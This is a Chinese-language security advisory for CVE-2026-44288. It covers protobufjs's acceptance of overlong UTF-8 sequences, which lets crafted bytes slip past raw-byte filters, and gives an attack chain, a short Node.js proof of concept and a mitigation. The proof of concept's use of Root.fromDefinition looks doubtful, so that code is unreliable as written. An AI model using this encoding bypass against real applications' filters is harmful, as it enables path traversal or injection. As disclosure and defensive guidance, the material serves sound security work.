CVE-2026-44288 protobufjs UTF-8解码安全绕过漏洞

漏洞信息

漏洞编号

CVE-2026-44288

漏洞类型

安全绕过

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

protobufjs

漏洞概述

protobufjs在7.5.6和8.0.2之前的版本中存在安全绕过漏洞。其包含的最小UTF-8解码器错误地接受并解码了超长UTF-8字节序列。攻击者可利用此漏洞构造特殊的二进制数据，绕过应用程序在字符串解码前对原始字节的检查，导致原本被过滤的ASCII字符通过解码后出现，从而破坏应用的安全校验机制。

技术细节

该漏洞的根本原因在于protobufjs库自带的UTF-8解码器实现不符合标准。标准UTF-8解码应拒绝或替换超长编码，但受影响版本将其解码为对应的规范字符。例如，攻击者可以将斜杠字符（ASCII 0x2F）编码为超长UTF-8序列（如0xC0 0xAF）。如果应用程序在解析protobuf消息前检查原始字节中是否存在0x2F以防止目录遍历，该检查会通过。然而，当protobufjs将数据解码为字符串时，超长序列会被还原为“/”，从而绕过了防御逻辑。这属于一种编码混淆攻击，利用了输入验证层和解码层对字符理解的不一致性。

攻击链分析

STEP 1

侦察

识别目标应用程序是否使用了受影响版本的protobufjs库，并且依赖对二进制数据的字节级检查（如过滤特殊字符）。

STEP 2

构造载荷

攻击者使用超长UTF-8编码（Overlong Encoding）将恶意字符（如路径分隔符、命令分隔符）进行编码，生成Protobuf二进制数据。

STEP 3

发送载荷

将构造好的恶意二进制数据发送给目标应用程序的接口。

STEP 4

绕过检查

应用程序的安全检查机制扫描原始字节，未发现被禁止的规范字节序列（例如未发现0x2F），从而允许数据通过。

STEP 5

解码与执行

protobufjs库解码数据，将超长序列还原为恶意字符。应用程序后续逻辑处理该字符串，导致攻击者绕过安全限制（如路径遍历、注入攻击）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// Conceptual PoC for protobufjs UTF-8 Overlong Decoding
// Vulnerable versions: < 7.5.6, < 8.0.2
const protobuf = require("protobufjs");

// Define a simple message type with a string field
const root = protobuf.Root.fromDefinition({
    nested: {
        Message: {
            fields: {
                content: { type: "string", id: 1 }
            }
        }
    }
});

const Message = root.lookupType("Message");

// Normal byte for 'A' is 0x41.
// Overlong encoding for 'A' is 0xC0 0x81 (2-byte representation of a 1-byte character).
// Bypass logic: Check raw bytes for 0x41 (Block it), but allow 0xC0 0x81.

function checkRawBytes(buffer) {
    // Simulate a security check blocking 'A'
    for (let i = 0; i < buffer.length; i++) {
        if (buffer[i] === 0x41) {
            throw new Error("Security check failed: 'A' found in raw bytes.");
        }
    }
    console.log("Security check passed.");
}

// Construct malicious payload using overlong encoding
// Wire format: Tag (Field 1, Wire Type 2) + Length + Value
// Tag: 0x0A (Field 1 << 3 | 2)
// Length: 0x02
// Value: 0xC0 0x81 (Overlong 'A')
const maliciousBuffer = Buffer.from([0x0A, 0x02, 0xC0, 0x81]);

try {
    checkRawBytes(maliciousBuffer);
    
    // Decode using protobufjs (vulnerable version)
    const decoded = Message.decode(maliciousBuffer);
    console.log("Decoded string:", decoded.content); 
    
    // If vulnerable, this prints "A" despite the check.
    if (decoded.content === 'A') {
        console.log("Vulnerability exploited: Overlong encoding bypassed filter.");
    }
} catch (e) {
    console.error(e.message);
}

影响范围

protobufjs < 7.5.6

protobufjs >= 8.0.0, < 8.0.2

防御指南

临时缓解措施

在数据处理流程中，除了检查原始字节外，务必对protobuf解码后的字符串内容进行安全验证。可以使用标准的合规UTF-8解码器对输入进行预检查，拒绝非最短形式的编码序列。